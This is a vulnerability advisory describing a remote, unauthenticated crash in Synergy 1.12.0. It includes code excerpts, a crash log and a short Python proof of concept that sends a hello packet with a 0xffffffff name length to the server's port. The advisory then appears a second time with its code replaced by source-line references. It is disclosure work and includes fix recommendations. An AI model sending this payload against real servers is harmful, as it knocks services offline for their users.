Advisory
Zendesk Ticket: 132450
Vendor: Symless
Software: Synergy
Software URL: https://github.com/symless/synergy-core https://symless.com/synergy
Version Reviewed: 1.12.0, protocol version 1.6
Bug Type: Denial of Service / Crash
Vector: Remote, unauthenticated
Impact: Denial of Service
Discovery Date: 20200706
Discovered By: Sven Blumenstein of Apple Information Security
CVSS: 6.5
Summary:
A Synergy server can be crashed by sending a kMsgHelloBack packet with a client name length set to
0xffffffff (4294967295) if the servers memory is less than 4 GB.
Technical Details:
If a client sends a kMsgHelloBack packet, the size of the client name is sent as 4 bytes, that are parsed as follows:
|
UInt32 len = (static_cast<UInt32>(buffer[0]) << 24) | |
|
(static_cast<UInt32>(buffer[1]) << 16) | |
|
(static_cast<UInt32>(buffer[2]) << 8) | |
|
static_cast<UInt32>(buffer[3]); |
Next a buffer is allocated based on that value:
|
UInt8* sBuffer = buffer; |
|
if (!useFixed) { |
|
sBuffer = new UInt8[len]; |
|
} |
This will fail if the requested buffer size is larger than the available system memory and get catched by the following code:
|
} catch (std::bad_alloc &ba) { |
|
delete server; |
|
throw ba; |
|
} |
Log file output of a crash based on this issue:
synergys -f -d DEBUG2 --config synergy.conf
[...]
[2020-07-06T15:14:45] NOTE: accepted client connection
[2020-07-06T15:14:45] DEBUG1: registered event type inputReady as 37
[2020-07-06T15:14:45] DEBUG1: registered event type outputError as 38
[2020-07-06T15:14:45] DEBUG1: registered event type inputShutdown as 39
[2020-07-06T15:14:45] DEBUG1: registered event type outputShutdown as 40
[2020-07-06T15:14:45] DEBUG1: saying hello
[2020-07-06T15:14:45] DEBUG2: writef(Synergy%2i%2i)
[2020-07-06T15:14:45] DEBUG1: registered event type outputFlushed as 41
[2020-07-06T15:14:45] DEBUG2: wrote 11 bytes
[2020-07-06T15:14:45] DEBUG1: registered event type success as 42
[2020-07-06T15:14:45] DEBUG1: registered event type failure as 43
[2020-07-06T15:14:45] DEBUG1: parsing hello reply
[2020-07-06T15:14:45] DEBUG2: readf(Synergy%2i%2i%s)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 1 (0x1)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 6 (0x6)
[2020-07-06T15:14:45] DEBUG1: caught cancel on thread 0x00000002
[2020-07-06T15:14:45] FATAL: An error occurred: std::bad_alloc
Synergy config file and proof of concept:
synergy.conf:
section: screens
synclient:
syntest:
end
section: links
synclient:
right = syntest
syntest:
left = synclient
end
Proof of concept:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.13.37.207', 24800))
print s.recv(2048)
s.sendall('\x00\x00\x00\x10Synergy\x00\x01\x00\x06\xff\xff\xff\xffA')
It was verified that this issue does not cause a crash through the exception handler if the
available memory of the Server is more than 4GB.
Recommendations:
- Limit the maximum value of a string parameter to a more resonable amount for the kMsgHellBack packet.
- Check string allocation size against available memory and catch an exception without terminating the server.
Advisory
Zendesk Ticket: 132450
Vendor: Symless
Software: Synergy
Software URL: https://github.com/symless/synergy-core https://symless.com/synergy
Version Reviewed: 1.12.0, protocol version 1.6
Bug Type: Denial of Service / Crash
Vector: Remote, unauthenticated
Impact: Denial of Service
Discovery Date: 20200706
Discovered By: Sven Blumenstein of Apple Information Security
CVSS: 6.5
Summary:
A Synergy server can be crashed by sending a kMsgHelloBack packet with a client name length set to
0xffffffff (4294967295) if the servers memory is less than 4 GB.
Technical Details:
If a client sends a kMsgHelloBack packet, the size of the client name is sent as 4 bytes, that are parsed as follows:
synergy-core/src/lib/synergy/ProtocolUtil.cpp
Lines 208 to 211 in 0e7fef7
Next a buffer is allocated based on that value:
synergy-core/src/lib/synergy/ProtocolUtil.cpp
Lines 217 to 220 in 0e7fef7
This will fail if the requested buffer size is larger than the available system memory and get catched by the following code:
synergy-core/src/lib/synergy/ServerApp.cpp
Lines 660 to 663 in 78be330
Log file output of a crash based on this issue:
synergys -f -d DEBUG2 --config synergy.confSynergy config file and proof of concept:
synergy.conf:
Proof of concept:
It was verified that this issue does not cause a crash through the exception handler if the
available memory of the Server is more than 4GB.
Recommendations: